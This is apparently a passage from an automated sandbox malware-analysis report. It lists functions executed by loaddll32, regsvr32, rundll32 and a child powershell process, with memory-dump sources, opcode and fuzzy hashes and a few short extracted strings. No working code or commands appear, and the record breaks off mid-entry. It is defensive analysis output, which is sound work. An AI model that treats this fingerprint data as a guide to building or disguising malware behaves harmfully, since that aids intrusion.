Opcode ID: 5319bfe8ab741efbbe33474d5307a7f0a136408ed2c725124282a19b29b1f944
Instruction ID: 80f3c2b13cbd4d07e19b279b0325840751a76b7098437db579097d599de0de9c
Opcode Fuzzy Hash: 5319bfe8ab741efbbe33474d5307a7f0a136408ed2c725124282a19b29b1f944
Instruction Fuzzy Hash: 521126B15043409FDB35EF68D9C8B26FFE5EB88354F288A6DD5094B241C33AD447C662

Function 01870869 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1912836543.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1870000_loaddll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 287439f48467e124274ece82b7659802dab6682142ef4371391d4222a732755d
Instruction ID: be40aeea92db86a99828c43f04543c063ee997358c1061d1749e95e100bc0067
Opcode Fuzzy Hash: 287439f48467e124274ece82b7659802dab6682142ef4371391d4222a732755d
Instruction Fuzzy Hash: C911A3706002098BDB14DB68D9547AE77F2FB89304F004968E045FB355CF79AD85CBA2

Function 017ED018 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1912634208.00000000017ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 017ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17ed000_loaddll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4df4c4273d6a2595017171db1794539883638d892c0566b696a49f91c8bab2d5
Instruction ID: f4f2f11ed5bcf485efc9e520a371ee7729517912d4883762d62655dfdbb3292f
Opcode Fuzzy Hash: 4df4c4273d6a2595017171db1794539883638d892c0566b696a49f91c8bab2d5
Instruction Fuzzy Hash: 0C01D6B1504784CFDB22DF58D5C8B15FFE5FB44314F248AA9D9494B642C33AD44ACB62

Function 01870ABF Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1912836543.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1870000_loaddll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 642b62a8a83cee92d1e4e4d7b650329f495e1716eee0620c11c8f94e2915ca0a
Instruction ID: a9de8b04ca182e16612c03619389103d7d89701af3f5ccb40ac6a7c9f6a7cbb9
Opcode Fuzzy Hash: 642b62a8a83cee92d1e4e4d7b650329f495e1716eee0620c11c8f94e2915ca0a
Instruction Fuzzy Hash: DBD0A7317401054ECF44E7B8E4112DCFF61FF81319F0049ADD109A7041DF77A54683A2

Function 01870848 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1912836543.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1870000_loaddll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88908d9cdcb19b00d8b273475812010e707a22e83ffb9403438772c1664aef99
Instruction ID: 9227cace6c8b63b3f6a967638bd250223efb49c192d7fda2ab230da91b1f858e
Opcode Fuzzy Hash: 88908d9cdcb19b00d8b273475812010e707a22e83ffb9403438772c1664aef99
Instruction Fuzzy Hash: C1B09274040609CBD65127E6A1081287AFD9B8C221B508021EA4F89A8A5E2516004AA2

Analysis Process: regsvr32.exePID: 6988, Parent PID: 4208COMMON

Executed Functions

Function 030A0549 Relevance: .4, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1920376637.00000000030A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_30a0000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a94e1196ca71eb99a924af4e85f57f13c89c74af952da2d826057f95f4f9b12
Instruction ID: 24f9ba1f8d6237d97b7e9931b5f7b5ece52d4f8696fc9545f6c59fcb25316e25
Opcode Fuzzy Hash: 0a94e1196ca71eb99a924af4e85f57f13c89c74af952da2d826057f95f4f9b12
Instruction Fuzzy Hash: 97D05E9540E3C54FDB4363B565A8288BF78CE97000B4504DBD5C6CB097AE1816138763

Function 030A0997 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1920376637.00000000030A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_30a0000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91542eecf1c96e8612c7d35bc35d9bb525091f4352df5310d3875fb8b6b3d70d
Instruction ID: 6216875330187977a0ca895f88bbd0a9f4e79947ac50b8edeeb1256132bee2fb
Opcode Fuzzy Hash: 91542eecf1c96e8612c7d35bc35d9bb525091f4352df5310d3875fb8b6b3d70d
Instruction Fuzzy Hash: E8218D747102098BDB05EBF8D9557AEBAA7EBC8300F105528D105AB794CF755C41CBD1

Function 0304D01C Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1920184076.000000000304D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0304D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_304d000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2e838b6c219071f48d10312e9952e93e09c68e64d5c996c3b737e253a34f429
Instruction ID: 64f62ebb936c386b2a02e9244b1aed7f9477476f4b26b5133377807ef91fff0e
Opcode Fuzzy Hash: e2e838b6c219071f48d10312e9952e93e09c68e64d5c996c3b737e253a34f429
Instruction Fuzzy Hash: 7B1108F15053449FDB24EF24D9C4B2ABBA8EB84714F248EBDE9494B242C33AD547C662

Function 0304D006 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1920184076.000000000304D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0304D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_304d000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 608183191439fa12431bee9c7292b1ae582c13758a0b6a5ca003e2f71622b333
Instruction ID: 5c9d2a83b5c101a9ac2a84a6af4b86a5b81560704b9a38617eae938a8224a07c
Opcode Fuzzy Hash: 608183191439fa12431bee9c7292b1ae582c13758a0b6a5ca003e2f71622b333
Instruction Fuzzy Hash: 2811C4F14097C08FDB13DF24D984715BFB4EB52214F2986EBC8858B693D33A994AC762

Function 030A0869 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1920376637.00000000030A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_30a0000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f7a68ed801ccf7e78d2a6f660420e5d12c1c67bb68d11965b9aa3244ef8059a
Instruction ID: 3b14448986184337e3db63f22938d2b0be632a4c9c7050f78d516c19cef0fbc7
Opcode Fuzzy Hash: 2f7a68ed801ccf7e78d2a6f660420e5d12c1c67bb68d11965b9aa3244ef8059a
Instruction Fuzzy Hash: F21102B46113099FDB14EBB4E8457EE7BB6FB84300F001928E0017F655CF786901CBA1

Function 030A0ABF Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1920376637.00000000030A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_30a0000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4c24f368cb8e05ecba2c5f14813561bd0c38a820a04bf39cc3ffa58f6be4589
Instruction ID: 191b05c126ef2696fb693e732b69dc30e5434ae8e57eecf469b36db2b638952d
Opcode Fuzzy Hash: c4c24f368cb8e05ecba2c5f14813561bd0c38a820a04bf39cc3ffa58f6be4589
Instruction Fuzzy Hash: 3AD0A7357402054ECF44E7B8E4512DCBF61EF8131AF0049EDD105AB041DF77A54683A2

Function 030A0848 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1920376637.00000000030A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_30a0000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e9171f87423b405d7e532a0e96ecced93be92a1fe355f31e3e35009d7c3b703
Instruction ID: a60ade95f592b93f061cf907244ef042cc4289d122b94fc3263774fc375e7381
Opcode Fuzzy Hash: 2e9171f87423b405d7e532a0e96ecced93be92a1fe355f31e3e35009d7c3b703
Instruction Fuzzy Hash: E8B092B8441209CBDA4137E6A2093187A3D9B88201B400011EA4E4128B5F29171049A2

Analysis Process: rundll32.exePID: 1740, Parent PID: 4208COMMON

Executed Functions

Function 04F20549 Relevance: .4, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1959381332.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4f20000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 610cd07b9e56c98e875a730cc70aa63e6988241cf819137cd21a0d38ef4d2414
Instruction ID: 4ad03211d63f0bb42e06523425128732561ce6789c53e2eba8a46c4fa583c86a
Opcode Fuzzy Hash: 610cd07b9e56c98e875a730cc70aa63e6988241cf819137cd21a0d38ef4d2414
Instruction Fuzzy Hash: D8D0176400D3C68FE70313B564280293F79CB87102B0504FAE8C9870D78A1829699B66

Function 04F2099B Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1959381332.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4f20000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4aaeb149c1df4bb108fcbe861367894a2d68a8f51e36c87289c2e6abc53e2609
Instruction ID: b227a9023f69034014c63c3387d6d53dcab2c6ce89b979715b0eb171879db1f2
Opcode Fuzzy Hash: 4aaeb149c1df4bb108fcbe861367894a2d68a8f51e36c87289c2e6abc53e2609
Instruction Fuzzy Hash: 2721E270B002199FDB05EBB4D95476E77A7EFC9300F204428DA45A7394CF756D82DBA1

Function 04E6D01C Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1958870202.0000000004E6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4e6d000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f0136d07daa06349e9a4fae5518117e3c856cd0436962f3a3ee6422132ae90e
Instruction ID: a05a9a544d2f125c6b19d90cd28fc3c925c422fa2b9b8fa0b50092f40f020d4d
Opcode Fuzzy Hash: 7f0136d07daa06349e9a4fae5518117e3c856cd0436962f3a3ee6422132ae90e
Instruction Fuzzy Hash: 2C1106B17882409FDB64DF24EDC0F26BB56E784358F60996DD50A4B241D23AE447C661

Function 04E6D005 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1958870202.0000000004E6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4e6d000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2502cb8be4fbd4c774c228e9674e00bead710c6d186590c4d033275b50fe2c1
Instruction ID: 17d1fc4d7620417c8659211d5bb54acf505c17f085cde4db018a3629d9b77cc7
Opcode Fuzzy Hash: e2502cb8be4fbd4c774c228e9674e00bead710c6d186590c4d033275b50fe2c1
Instruction Fuzzy Hash: 0911A7715497C08FD713DF24D984B15BF71EB41218F2886EAC849CB593C33A944AC762

Function 04F20869 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1959381332.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4f20000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 238fcda776101228fc96f09d5d19edc8b2114bb928cb6dabafa5d21b2c1589fe
Instruction ID: 7ac3df5e230300254cbe4991333ec6af22051645e267cbc323ea95e6b823ae0c
Opcode Fuzzy Hash: 238fcda776101228fc96f09d5d19edc8b2114bb928cb6dabafa5d21b2c1589fe
Instruction Fuzzy Hash: B61102306002558FEB14DB34D9147AE7BB2FF89305F040928DA46AB356CF787D45CBA1

Function 04F20ABF Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1959381332.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4f20000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 243ca0db8dd622add24e2e6839e34385fa0753748ffa130f4a4dafdd9c397aff
Instruction ID: 5c0a1815edc214236cff6ba06cff58bcc68e0ac71d8e80820f3844657e423c00
Opcode Fuzzy Hash: 243ca0db8dd622add24e2e6839e34385fa0753748ffa130f4a4dafdd9c397aff
Instruction Fuzzy Hash: 91D0A7317402054ECF45E7B8E4112DCFF61EF81319F0049ADD505A7041DF77A54683A2

Function 04F20848 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1959381332.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4f20000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46659339287d3151dc581f77397768fb38d0961e1a643521d7593d9f1c83492d
Instruction ID: 8b2ee3f1bbedbfa829bf2ab1ec062081736590df967ea2e951988869d3306aeb
Opcode Fuzzy Hash: 46659339287d3151dc581f77397768fb38d0961e1a643521d7593d9f1c83492d
Instruction Fuzzy Hash: 6EB092B4840209CFD64127E6B10C11A7A2FDB88252F400021EA4E422CA5F291A0049AA

Analysis Process: rundll32.exePID: 6036, Parent PID: 6644COMMON

Executed Functions

Function 05170549 Relevance: .4, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1967790754.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5170000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa9b036d4430bda127dcebd562537a5dc69bd996dbb28e9cf6f98cf362a649bc
Instruction ID: c4297cfe7899364ac20915bfdef895b38235eafee93689b4bccec938ad8811c6
Opcode Fuzzy Hash: fa9b036d4430bda127dcebd562537a5dc69bd996dbb28e9cf6f98cf362a649bc
Instruction Fuzzy Hash: EBD05E6080D7C58FC70327B4757B1687F38EE8B101F1A44DBD5C986093891809038B63

Function 05170991 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1967790754.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5170000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0aa09665000fbdd1124615e4976679334dfb6a72b62b29eb009b3ec382d64b9
Instruction ID: e149fe7a92577ab9d105ed2026b71c7430b0f676fb665b7b38d78f25578bcd38
Opcode Fuzzy Hash: c0aa09665000fbdd1124615e4976679334dfb6a72b62b29eb009b3ec382d64b9
Instruction Fuzzy Hash: 1521B4707013098BDB04EBB8E9597EE77BBEB88300F104528D206AB794CFB55D428F95

Function 04F5D01C Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1967192139.0000000004F5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4f5d000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 879c2b218dbc031abf25b0db60c7a0767912bd1232b441c806e7ba7357cd1f9c
Instruction ID: fa381ce590b0900be348a4c7be1ef228327d20b46094fee9bcde4e36fc9b8dd6
Opcode Fuzzy Hash: 879c2b218dbc031abf25b0db60c7a0767912bd1232b441c806e7ba7357cd1f9c
Instruction Fuzzy Hash: 8E115EB1A05340DFDB14DF24E9C0B26BB54FB44314F20C96DDE094B265D33AE447C661

Function 04F5D005 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1967192139.0000000004F5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4f5d000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 145cd8d026f5ca061f1203b7f9fa823a34d69458ae30200f2e6e9302a432a3e1
Instruction ID: 7cd9ea5fcd7f95801e4f6a8bc057cba253de9c5e6d88b62f42682497a3039b45
Opcode Fuzzy Hash: 145cd8d026f5ca061f1203b7f9fa823a34d69458ae30200f2e6e9302a432a3e1
Instruction Fuzzy Hash: 1E1191B190A7C08FDB16DF24D584715BF71EB42214F24C6EAC9898B6A7C33A944BC762

Function 05170869 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1967790754.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5170000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24d0eeaae1f778297fe58bc48da796b9a91a46f37f05544ae9543655402bd5cd
Instruction ID: e5f8e11aaa9f1c300428cc331acaa84f016bed5051773bde21618592ffc32793
Opcode Fuzzy Hash: 24d0eeaae1f778297fe58bc48da796b9a91a46f37f05544ae9543655402bd5cd
Instruction Fuzzy Hash: 41119E30600309CBDB14EB28E8597AE77B6FB88304F004928D1466B251CFB96906CFA2

Function 05170ABF Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1967790754.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5170000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf17a2a53c5888cc397d7d99c80d3e84c81675efc3b58ad8ca66bec8ea968272
Instruction ID: b16a442a6b68d83337e2c568c3b4c1f39360f6114c445b3e62bc7cb50860734a
Opcode Fuzzy Hash: bf17a2a53c5888cc397d7d99c80d3e84c81675efc3b58ad8ca66bec8ea968272
Instruction Fuzzy Hash: D7D05E316401054ACF44E6B8A4112DCBB61EF81219F0049ADD105A7041DF67A54683A2

Function 05170848 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1967790754.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5170000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6d62ec940db0a9e0f9a6e9d2e22f0e611941adfeced20ef89fa06da49354ac2
Instruction ID: 200434c983d4b0ed6cbd32e0f5bea8ca9fe837f1c2c14187f035ec0e2e472d4c
Opcode Fuzzy Hash: c6d62ec940db0a9e0f9a6e9d2e22f0e611941adfeced20ef89fa06da49354ac2
Instruction Fuzzy Hash: F5B0927404030DCBD64227E5B1082187A3DDB88201F400011EB8E4128A5E291A4159A2

Analysis Process: powershell.exePID: 5052, Parent PID: 1740COMMON

Executed Functions

Function 0435B490 Relevance: 4.0, Strings: 3, Instructions: 258COMMON

Download Yara Rule

Strings

[~n^, xrefs: 0435B529
kU~n^, xrefs: 0435B770, 0435B775
{U~n^, xrefs: 0435B738, 0435B73D

Memory Dump Source

Source File: 00000006.00000002.1768177557.0000000004350000.00000040.00000800.00020000.00000000.sdmp, Offset: 04350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4350000_powershell.jbxd

Similarity

API ID:
String ID: kU~n^${U~n^$[~n^
API String ID: 0-2873486354
Opcode ID: bfb8de048cd0530df578e188e5bdba52bc8e644498ef716b39346f36351d19d6
Instruction ID: cb3f7d54c99252effd672b8e5b1022fd57cfc575e1152c6c9fea18b6238a5a65
Opcode Fuzzy Hash: bfb8de048cd0530df578e188e5bdba52bc8e644498ef716b39346f36351d19d6
Instruction Fuzzy Hash: 739181B0F006159BEB19EFB48511A6EBBF6EFC4710B00991DE506AB364DF34AE058BC5

Function 0435B4A0 Relevance: 4.0, Strings: 3, Instructions: 252COMMON

Download Yara Rule

Strings

[~n^, xrefs: 0435B529
kU~n^, xrefs: 0435B770, 0435B775
{U~n^, xrefs: 0435B738, 0435B73D

Memory Dump Source

Source File: 00000006.00000002.1768177557.0000000004350000.00000040.00000800.00020000.00000000.sdmp, Offset: 04350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4350000_powershell.jbxd

Similarity

API ID:
String ID: kU~n^${U~n^$[~n^
API String ID: 0-2873486354
Opcode ID: 7482993ab782bf48fd7e817a0058e39a3d4148a377dbffffb2acb33c72025c52
Instruction ID: eb10986503aa78c65ab3f4c27ec8087eebacf6d81c75033940765352949139a5
Opcode Fuzzy Hash: 7482993ab782bf48fd7e817a0058e39a3d4148a377dbffffb2acb33c72025c52
Instruction Fuzzy Hash: E89171B0F006159BEB19EFB48511A6EBBF6EFC4710B00991DE506AB354DF34AE058BC5

Function 071C3CE8 Relevance: 5.6, Strings: 4, Instructions: 584COMMON

Download Yara Rule

Strings

4'fq, xrefs: 071C418A
4'fq, xrefs: 071C4026
4'fq, xrefs: 071C4030
4'fq, xrefs: 071C4180

Memory Dump Source

Source File: 00000006.00000002.1815556226.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'fq$4'fq$4'fq$4'fq
API String ID: 0-359900465
Opcode ID: 419c00487715b2284289a19b4e96bb6e34227dfbd312c252c9453b88f50cf430
Instruction ID: 08c8cdeab91377ad616305964442925c58ff1feee993a4c2af969babba94ce46
Opcode Fuzzy Hash: 419c00487715b2284289a19b4e96bb6e34227dfbd312c252c9453b88f50cf430
Instruction Fuzzy Hash: 831248F1B042518FCB26DBB884117AABFA2AFE1214F14C07ED955DB6C1DB31D852C7A2

Function 04356FE0 Relevance: 1.4, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

(jq, xrefs: 04357105

Memory Dump Source

Source File: 00000006.00000002.1768177557.0000000004350000.00000040.00000800.00020000.00000000.sdmp, Offset: 04350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4350000_powershell.jbxd

Similarity

API ID:
String ID: (jq
API String ID: 0-3225323518
Opcode ID: f5c4f8114db556e5d4aa9f878aeace34804948a5a34eeb38ebc097d6c6792ad3
Instruction ID: f58f0d27faa29f8ab0c52146e130eb7451bee4f8963e036ad2f4f733143606f6
Opcode Fuzzy Hash: f5c4f8114db556e5d4aa9f878aeace34804948a5a34eeb38ebc097d6c6792ad3
Instruction Fuzzy Hash: C5413E34B042058FDB14DF68C458AAEBBF2EF8D311F145499D806AB3A1DB35ED01CB61

Function 0435AFA8 Relevance: 1.3, Strings: 1, Instructions: 81COMMON

Download Yara Rule

Strings

(&fq, xrefs: 0435AFCA

Memory Dump Source

Source File: 00000006.00000002.1768177557.0000000004350000.00000040.00000800.00020000.00000000.sdmp, Offset: 04350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4350000_powershell.jbxd

Similarity

API ID:
String ID: (&fq
API String ID: 0-1822945044
Opcode ID: d5e7ceef2154876e9d3fbeae95e6a9234e22ee20efad2d1938e410a22c35a38d
Instruction ID: 90c07fde45bb43d76a17700552a2dcc8761916cea4192f19ebdf9c82347b2a6e
Opcode Fuzzy Hash: d5e7ceef2154876e9d3fbeae95e6a9234e22ee20efad2d1938e410a22c35a38d
Instruction Fuzzy Hash: 1621A175A042588FCB14DFAED840B9EBBF5EF88320F24842AD418E7350CB75A9058BA5

Function 043529F0 Relevance: .2, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1768177557.0000000004350000.00000040.00000800.00020000.00000000.sdmp, Offset: 04350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4350000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1c82c938d1dfd0d5912775d9b6e325c72e8f6357454cf1288dcbd086240270c
Instruction ID: 839cd7546f1c5c0b2bed9032467f81702dcaa1d7a14a098a690029671f10f669
Opcode Fuzzy Hash: d1c82c938d1dfd0d5912775d9b6e325c72e8f6357454cf1288dcbd086240270c
Instruction Fuzzy Hash: 74914974A002059FCB15CF59C4949AEFBB1FF88310B2486A9D955AB3A5C735FC91CFA0

Function 071C28E8 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1815556226.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 640e332bdc8bbfb119baab6c08c7ee227a4d9c5492dd7ad2f92f9e09474bc582
Instruction ID: 436bdbd01e80a4f7958fc82460ae345a9e476dde2871f5b2a9b37c037d97fc61
Opcode Fuzzy Hash: 640e332bdc8bbfb119baab6c08c7ee227a4d9c5492dd7ad2f92f9e09474bc582
Instruction Fuzzy Hash: 615148B1B003159FCB26DBBC894176ABFE2BF9A210F1440AED5459B692DB30CC41C762

Function 04357740 Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1768177557.0000000004350000.00000040.00000800.00020000.00000000.sdmp, Offset: 04350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4350000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1aa31e243fe3998d6b06312dcd2b9607fc5fe0fcd3a9dd45c83308f42eb2259b
Instruction ID: fa14ba1216309899d490b0271139ac6f133a5702aaf6111a5250ad186e7acb99
Opcode Fuzzy Hash: 1aa31e243fe3998d6b06312dcd2b9607fc5fe0fcd3a9dd45c83308f42eb2259b
Instruction Fuzzy Hash: 9451C0303042059FD7049BB9D854E2A7BEAFFC9314F159469E809CB361EB35EC01C7A0

Function 0435BAD0 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1768177557.0000000004350000.00000040.00000800.00020000.00000000.sdmp, Offset: 04350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4350000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4786debc82ce9257f405aaa9081a5bc9729f975af5f9ab999a5f09edcde400d8
Instruction ID: 6a48505c25385b1cf63cf853a92b4d8dca88c5299f04f53f77e15848c765f89d
Opcode Fuzzy Hash: 4786debc82ce9257f405aaa9081a5bc9729f975af5f9ab999a5f09edcde400d8
Instruction Fuzzy Hash: ED61F7B1E00248DFCB14DFA9D584A9DFBF5EF88310F149129E819AB364DB70AD41CB90

Function 0435BAC0 Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1768177557.0000000004350000.00000040.00000800.00020000.00000000.sdmp, Offset: 04350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4350000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f26e91bddfe5381a282fc9c9848a733df67598567e6a7ad424526bc9077030b
Instruction ID: 200716cb0379afc04dbb2484ab13ce80b7658f8331baf2fce2fb88e0568d5300
Opcode Fuzzy Hash: 6f26e91bddfe5381a282fc9c9848a733df67598567e6a7ad424526bc9077030b
Instruction Fuzzy Hash: C25105B1E00248DFCB14DFA9D584A9DFBF5EF88310F149129E819AB364EB70AC41CB90

Function 071C271F Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1815556226.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2add32493fc35c98671202396ecb59fcb1593f719a3b973968da6d2dccb53ef3
Instruction ID: 72ff773e8a7df6c6a23c354ff8c6e99e9254fbd5c892bb9633a4205541dff9d6
Opcode Fuzzy Hash: 2add32493fc35c98671202396ecb59fcb1593f719a3b973968da6d2dccb53ef3
